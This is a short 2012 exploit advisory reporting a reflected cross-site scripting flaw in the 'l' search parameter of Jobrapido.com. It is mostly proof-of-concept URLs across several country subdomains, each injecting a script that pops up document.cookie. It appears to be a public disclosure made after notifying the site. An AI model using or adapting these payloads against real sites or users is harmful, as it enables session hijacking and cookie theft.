+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title           : Jobrapido.com Multiple XSS 
# Date                    : 07-03-2012
# Author                  : Ivano Binetti (http://www.ivanobinetti.com)
# Web site                : http://www.jobrapido.com
# Web master notification : 07/11/2011

+--------------------------------------------------------------------------------------------------------------------------------+

PoC:
http://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

This PoC works for all third-level domains.


 
+--------------------------------------------------------------------------------------------------------------------------------+